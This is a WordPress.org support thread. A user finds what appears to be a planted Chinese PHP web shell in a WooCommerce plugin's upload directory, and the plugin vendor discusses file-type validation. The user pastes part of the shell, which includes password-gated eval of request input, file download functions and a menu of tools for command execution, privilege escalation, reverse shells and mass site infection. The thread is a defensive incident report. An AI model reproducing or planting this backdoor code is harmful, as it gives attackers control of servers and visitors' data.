Title: WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen Last modified: November 10, 2020 --- # WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen * Resolved [jh](https://wordpress.org/support/users/jethrohazelhurst/) * (@jethrohazelhurst) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/) * Windows Defender discovered a threat while I was extracting a WordPress backup of my live site onto my localhost. * The warning is Exploit:JS/ShellCode.gen. * So I had a closer look at that file caches_data_thumb.php. * This is inside the directory “ppom_files”. Putting PPOM into google shows this was a plugin which was installed a while back to add extra options for WooCommerce products. This plugin was removed a while ago shortly after it was installed however the directories are still here. * I opened caches_data_thumb.php in my editor and it’s got some dodgy code in it with chinese characters, see below: * ``` $v) $_POST[$k] = stripslashes($v); foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v); } if(isset($_REQUEST[postpass])){ hmlogin(2); @eval($_REQUEST[postpass]); exit;} if($_COOKIE['postpass'] != md5(postpass)){ if($_POST['postpass']){ if($_POST['postpass'] == postpass){ setcookie('postpass',md5($_POST['postpass'])); hmlogin(); }else{ echo '
用户或密码错误
'; } } islogin($shellname,$myurl); exit; } if(isset($_GET['down'])) do_down($_GET['down']); if(isset($_GET['pack'])){ $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out,$_SERVER['HTTP_HOST'].".tar.gz"); } if(isset($_GET['unzip'])){ css_main(); start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); exit; } define('root_dir',str_replace('\\','/',dirname(myaddress)).'/'); define('run_win',substr(PHP_OS, 0, 3) == "WIN"); define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if($img) css_img($img); if($eanver == "phpinfo") die(phpinfo()); if($eanver == 'logout'){ setcookie('postpass',null); die(''); } $class = array( "信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"), "提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"), "批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文 etc etc, goes on for 100s of lines... ``` * Inside that directory there is other code too. An index.html with html for a landing page for a roof replacement company! * This leads me to believe this plugin has added, or allowed the upload of, malicious code. * Now my question is why has this happened? And how do I vouch for the integrity of my WooCommerce site and clean up this mess? And who’s to say there isn’t more of this garbage hiding out in sub-folders of sub-folders! Viewing 5 replies - 1 through 5 (of 5 total) * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13648987) * Hi, * It seems you allowed file upload and you didn’t set file types properly, you must deny the .PHP types and only accept the file you really need. * You should remove ppom_files entirely and then set the file types from File Input. * [terrafire123](https://wordpress.org/support/users/terrafire123/) * (@terrafire123) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13652640) * Sorry, but why doesn’t the plugin prevent PHP and HTML file upload? This seems like a extremely basic security precaution that users can’t and shouldn’t be expected to manage. * There are many, many extremely inexperienced webdevs, who, unlike OP, if in a similar situation would never be able to resolve this. * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13653881) * Hi, * yes our plugin has this already check to stop uploading the PHP, Html files like here I have even added the PHP file as allowed filetype: [https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing](https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing) * But on front-end, our plugin deny to accept it if someone try to upload these files: [https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo](https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo) * [terrafire123](https://wordpress.org/support/users/terrafire123/) * (@terrafire123) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13654168) * > Hi, > yes our plugin has this already check to stop uploading the PHP, Html files > like here I have even added the PHP file as allowed filetype: [https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing](https://drive.google.com/file/d/10KTJeslAc6DoGIcaCLjoee5WATYiqk1A/view?usp=sharing) > But on front-end, our plugin deny to accept it if someone try to upload these > files: > [https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo](https://nmdevteam.com/ppom/product/small-shirts/?ppom_title=file-upload-demo) * ….But if the server denies uploading of PHP files, then how can any of OP’s mistakes have caused the issue? * Front-end validation is, of course, NEVER enough, because the browser can’t ever be trusted… - This reply was modified 5 years, 7 months ago by [terrafire123](https://wordpress.org/support/users/terrafire123/). - This reply was modified 5 years, 7 months ago by [Yui](https://wordpress.org/support/users/fierevere/). * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13659497) * Yes we know, the font-end validation is not enough, we have added this on server side you can see this inside inc/files.php near line 159 like this; * ``` $bad_types = array('php','php4','php5','php6','php7','phtml','exe'); if( in_array( strtolower($file_type), $bad_types) ){ $response ['status'] = 'error'; $response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' ); wp_send_json( $response ); } ``` Viewing 5 replies - 1 through 5 (of 5 total) The topic ‘WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode. gen’ is closed to new replies. * ![](https://ps.w.org/woocommerce-product-addon/assets/icon-256x256.gif?rev=3186763) * [PPOM - Product Addons & Custom Fields for WooCommerce](https://wordpress.org/plugins/woocommerce-product-addon/) * [Frequently Asked Questions](https://wordpress.org/plugins/woocommerce-product-addon/#faq) * [Support Threads](https://wordpress.org/support/plugin/woocommerce-product-addon/) * [Active Topics](https://wordpress.org/support/plugin/woocommerce-product-addon/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/woocommerce-product-addon/unresolved/) * [Reviews](https://wordpress.org/support/plugin/woocommerce-product-addon/reviews/) * 5 replies * 3 participants * Last reply from: [N-Media](https://wordpress.org/support/users/nmedia/) * Last activity: [5 years, 7 months ago](https://wordpress.org/support/topic/wordpress-backup-extraction-on-windows-threat-found-exploitjs-shellcode-gen/#post-13659497) * Status: resolved